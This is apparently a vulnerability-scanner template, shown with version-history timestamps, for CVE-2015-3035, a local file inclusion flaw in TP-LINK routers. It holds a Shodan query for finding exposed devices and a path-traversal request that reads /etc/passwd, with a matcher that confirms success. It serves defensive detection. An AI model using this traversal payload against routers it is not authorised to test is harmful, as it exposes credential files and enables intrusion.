2022-09-18 09:05:59 +00:00
id : CVE-2015-3035
2022-09-18 14:05:55 +00:00
2022-09-18 09:05:59 +00:00
info :
2022-09-18 14:05:55 +00:00
name : Multiple TP-LINK Products Vulnerable - Local File Inclusion
2022-09-18 09:05:59 +00:00
author : 0x_Akoko
severity : high
2022-09-18 14:05:55 +00:00
description : |
Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.
2022-09-18 09:05:59 +00:00
reference :
- https://seclists.org/fulldisclosure/2015/Apr/26
- https://nvd.nist.gov/vuln/detail/CVE-2015-3035
2022-09-20 18:45:23 +00:00
- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt
- http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware
2022-09-18 09:05:59 +00:00
classification :
cve-id : CVE-2015-3035
2022-09-18 14:05:55 +00:00
metadata :
shodan-query : http.title:"TP-LINK"
2022-09-20 18:45:23 +00:00
verified : "true"
tags : router,lfi,seclists,cve,cve2015,tplink,kev
2022-09-18 09:05:59 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/login/../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200